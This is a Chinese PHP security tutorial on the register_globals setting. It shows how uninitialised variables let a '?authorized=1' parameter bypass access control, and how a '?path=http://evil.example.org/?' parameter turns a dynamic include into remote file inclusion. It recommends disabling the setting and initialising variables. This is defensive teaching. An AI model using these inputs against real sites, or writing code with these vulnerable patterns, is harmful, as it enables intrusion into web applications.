PHP安全之Register Globals_PHP教程
推薦:三種解決PHP亂碼的方法1、PHP 如何處理上傳的CSV文件? 可以用fgetcsv函數: -- 從文件指針中讀入一行并解析 CSV 字段 但他無法處理里邊的中文; 所以在上傳后,要先把csv轉一下編碼; 2、編碼轉換; iconv(GB2312,UTF-8//IGNORE,file_get_contents($uploadfile)); ignore的意思是
register_globals參數在 PHP 的 4.2.0 及以上版本中默認為屏蔽。雖然這并不認為是一個安全漏洞,但是的確是一個安全風險。因此,應該始終在開發過程中屏蔽register_globals。
為什么這是一個安全風險?每一種情形都需要的單獨說明才能描述清楚,對于所有情形只給出一個恰當的例子是非常困難的。不管怎樣,最常見的例子是在PHP手冊中描述的:
<?phpif (authenticated_user()){$authorized = true;}if ($authorized){include '/highly/sensitive/data.php';}?>當參數register_globals開啟的時候,這個頁面可以使用?authorized=1的參數訪問,從而繞過訪問控制。當然,這個明顯的漏洞是糟糕的開發造成的,而不是register_globals的原因,但是這明顯增加了產生危險漏洞的可能。消除了這個影響,普通的全局變量(比如本例中的$authorized)將不再受到客戶端提交的數據的影響。最好的方式是初始化全部變量并且將參數error_reporting設置為E_ALL,這樣使用未初始化的變量就不會在開發的時候被忽略。
另外一個關于register_globals的例子是在使用include包含動態路徑的時候可能產生問題:
<?phpinclude "$path/script.php";?>當參數register_globals開啟的時候,這個頁面可以使用?path=http://evil.example.org/?的參數訪問,使得本例中的代碼和下面的代碼等同:
<?phpinclude 'http://evil.example.org/?/script.php';?>如果參數allow_url_fopen開啟的時候(即便是在php.ini-recommended中,默認也是開啟的),這將如同包含本地文件一般包含http://evil.example.org/這樣的遠程文件。這是一個常見的安全漏洞,甚至在一些非常著名的開源項目中都發現。
初始化$path可以避免這個隱患,而且不用屏蔽參數register_globals。然而開發人員的失誤可能會產生沒有初始化的變量,修改全局配置以屏蔽參數register_globals可以盡可能的避免這種隱患被忽視。
便利性總是另人愉快的,過去我們不得不手工區分哪些是表單數據,哪些是普通變量。而使用$_POST和$_GET內建全局數組也是非常方便的,并且承擔因為開啟參數register_globals造成的風險很不值得。雖然我完全不同意將開啟參數register_globals等同于薄弱的安全,但是我還是強烈建議將其設置為關閉。
需要補充說明的是,屏蔽參數register_globals會幫助開發人員更加留意數據的來源,而這正是一個有安全意識的開發人員所應該具備的素質。
分享:任何使用PHP與XML進行網站編程一、HTML的局限性分析 1.HTML的可擴展性差。雖然作為一般的應用,HTML應經夠用了,但是在處理數學和化學等符號時,HTML有明顯的缺點,而且它無法進行擴展,這樣使它的發展收到了極大的限制。 2.鏈路丟失后不能自動糾正。由于Web頁面的URL地址經常改變,而在
- 相關鏈接:
- 教程說明:
PHP教程-PHP安全之Register Globals
。